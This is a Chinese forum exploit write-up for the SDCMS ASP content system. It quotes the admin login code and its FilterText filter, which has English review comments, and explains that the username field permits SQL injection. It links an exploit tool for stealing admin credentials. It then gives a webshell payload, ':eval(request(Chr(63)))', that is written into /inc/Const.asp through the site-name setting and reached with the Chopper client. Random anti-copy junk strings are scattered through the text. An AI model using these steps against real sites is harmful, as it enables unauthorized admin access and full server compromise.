作者:T00LS 鬼哥
漏洞文件:后台目录/index.asp
' Back-office login handler for the posted form fields username, password
' and yzm (CAPTCHA). Validates the CAPTCHA against Session("SDCMSCode"),
' enforces the per-day failed-login limit, looks the account up in Sd_Admin
' and, on success, stores the admin identity in cookies and redirects to
' sdcms_index.asp. Every failure path ends the response via died.
'
' NOTE(review): the Sd_Admin SELECT below is assembled by string
' concatenation. FilterText(...,1) only strips spaces and line breaks, so a
' single quote in the submitted username reaches the SQL text unchanged --
' this is the weakness the surrounding write-up describes. GetIp is
' concatenated into the UPDATE the same way; if it reads a client-supplied
' header the same concern applies (confirm in the GetIp helper). The
' password hash (Rs(2)) and the privilege flags are written to client
' cookies, so later authorization is only as trustworthy as those cookies.
Sub Check
	Dim loginName, loginPwd, captcha, expectedCaptcha, adminRs
	' Check_post is a project helper that rejects requests not posted from the site itself.
	If Check_post Then
		Echo "1禁止从外部提交数据!"
		Exit Sub
	End If
	loginName=FilterText(Trim(Request.Form("username")),1)
	loginPwd=FilterText(Trim(Request.Form("password")),1)
	captcha=Trim(Request.Form("yzm"))
	expectedCaptcha=Session("SDCMSCode")
	' errnum / loginnum are page-level globals: today's failed attempts vs. the allowed maximum.
	If errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
	' CAPTCHA must be present, numeric and equal to the value kept in the session.
	' NOTE(review): the copied listing shows a stray "ied" after these Alert
	' calls; it is read here as the ":died" terminator used on the line above -- confirm.
	If captcha="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
	If captcha<>"" And Not Isnumeric(captcha) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
	If captcha<>expectedCaptcha Then Alert "验证码错误!","javascript:history.go(-1)":died
	If loginName="" Or loginPwd="" Then
		Echo "用户名或密码不能为空":died
		Exit Sub
	End If
	' Credential lookup -- user input is concatenated into the WHERE clause (see header note).
	Set adminRs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&loginName&"' And Sdcms_Pwd='"&md5(loginPwd)&"'")
	If adminRs.Eof Then
		AddLog loginName,GetIp,"登录失败",1
		Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
	Else
		' Session state lives entirely in these cookies: id, name, password hash and privilege flags.
		Add_Cookies "sdcms_id",adminRs(0)
		Add_Cookies "sdcms_name",loginName
		Add_Cookies "sdcms_pwd",adminRs(2)
		Add_Cookies "sdcms_admin",adminRs(3)
		Add_Cookies "sdcms_alllever",adminRs(4)
		Add_Cookies "sdcms_infolever",adminRs(5)
		Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&adminRs(0)&"")
		AddLog loginName,GetIp,"登录成功",1
		' Purge Sd_Log rows older than 30 days. The two statements differ only in
		' date-function dialect; Sdcms_DataType presumably selects between the two
		' supported database engines -- confirm against the config.
		If Sdcms_DataType Then
			Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
		Else
			Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
		End If
		Go("sdcms_index.asp")
	End If
	adminRs.Close
	Set adminRs=Nothing
End Sub
: o9 J) D( _, d
我们可以看到 username 是通过 FilterText 来过滤的。我们看看 FilterText 的代码:
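' Filters user-supplied text before it is used elsewhere in the site.
'   t0 - text to filter; Null, arrays and the empty string yield "".
'   t1 - filter mode; the Case labels are the strings "1" and "2"
'        (Check passes the number 1):
'        "1"  remove ASCII space, CR and LF only. Everything else -- quotes,
'             comment markers, SQL punctuation -- passes through unchanged,
'             so this mode is NOT an injection filter.
'        "2"  remove control characters and most ASCII punctuation.
'        else HTML-encode &, ', ", < and >.
' Returns the filtered text. In every mode the word "expression" (matched
' case-insensitively) is broken up so it cannot be read as the CSS
' expression() keyword.
Function FilterText(ByVal t0,ByVal t1)
	Dim code
	' Null and arrays are tested before Len(): Len(Null) is Null and Len(array)
	' raises a type-mismatch error, so the original single Or-condition could
	' not reliably reject either of them.
	If IsNull(t0) Or IsArray(t0) Then
		FilterText=""
		Exit Function
	End If
	t0=Trim(t0)
	If Len(t0)=0 Then
		FilterText=""
		Exit Function
	End If
	Select Case t1
		Case "1"
			t0=Replace(t0,Chr(32),"")
			t0=Replace(t0,Chr(13),"")
			t0=Replace(t0,Chr(10)&Chr(10),"")   ' redundant: the next line removes every LF anyway
			t0=Replace(t0,Chr(10),"")
		Case "2"
			' Control characters BS, TAB, LF, VT, FF, CR, SYN, then space and the
			' ASCII punctuation ranges ! .. / , : .. @ , [ .. ` and { .. ~ .
			' Removing single characters one at a time is order-independent, so a
			' loop over the code list is equivalent to the original one-line-per-char form.
			For Each code In Array(8,9,10,11,12,13,22,32, _
					33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, _
					58,59,60,61,62,63,64, _
					91,92,93,94,95,96, _
					123,124,125,126)
				t0=Replace(t0,Chr(code),"")
			Next
		Case Else
			' & is encoded first so the entities added below are not re-encoded.
			' NOTE(review): the copy this listing was taken from shows identity
			' replacements here (e.g. Replace(t0,"&","&")) and an unterminated
			' literal on the quote line -- most likely HTML entities lost in
			' rendering. Entity encoding is assumed; confirm against the original file.
			t0=Replace(t0,"&","&amp;")
			t0=Replace(t0,"'","&#39;")
			t0=Replace(t0,"""","&quot;")
			t0=Replace(t0,"<","&lt;")
			t0=Replace(t0,">","&gt;")
	End Select
	' Break up "expression". The original used compare mode 0 (binary,
	' case-sensitive) although the guard lower-cases the text, so "EXPRESSION"
	' was detected but never replaced; compare mode 1 (text) makes the replace
	' match the guard. The replacement string carries an invisible character
	' between "e" and "x" (presumably a soft hyphen); if that byte was lost in
	' copying, the line becomes a no-op -- verify it is present.
	If Instr(Lcase(t0),"expression")>0 Then
		t0=Replace(t0,"expression","e­xpression",1,-1,1)
	End If
	FilterText=t0
End Function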
$ K/ s- L( P3 |$ r' E( j, p* \
看到没。直接参数是 1 时只过滤:
t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")
+ F8 X9 s2 a, w* v" [1 t( Q) e漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
9 y! w$ y1 k# P YEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP- }7 d' C! |6 k6 A, r& r
& |1 c8 B4 [ Y" Q; p% t& O7 V测试:1 A* j0 v0 c0 b b
; k* W, R6 Y* \. j/ c
" X' a5 h; R# V. B
现在输入工具上验证码,然后点OK( w0 g* Q9 a/ k1 b4 ^# s3 T
, n8 n* q E2 u* b* @: R5 x6 o
看到我们直接进入后台管理界面了,呵呵!
# B! Y; b2 T% f+ V$ H5 X
" W+ s; k. t% n% z! O
这样直接进入后台了。。。。
7 ]2 ^3 Q& @3 y/ Q
$ n$ K; m+ j4 T h4 j# u: C- H! W6 a K; g% ?' u, m% U& H% [
SDCMS提权:
# ~' e2 R+ T' C# I/ _
2 B* N8 z8 |# X' C7 I6 o, @方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?, K! [$ R9 K/ Q: \' P
@" \4 O1 H8 e$ s2 L9 g9 k
. i, P/ g1 D: ~" Z, E0 S1 q+ f+ a: ~- G
OK,现在用菜刀连接下!
& m; V! p' j& c$ k. H- W2 T5 h- x9 c& s+ E5 M3 r' G
+ L- H" ~: x2 e# M' I
! R V6 q) J& @4 k7 ^. W( e
3 @/ H8 j" o1 }. H% V' i4 u) u% ]
- u! I4 n4 u" I# G" K! {
|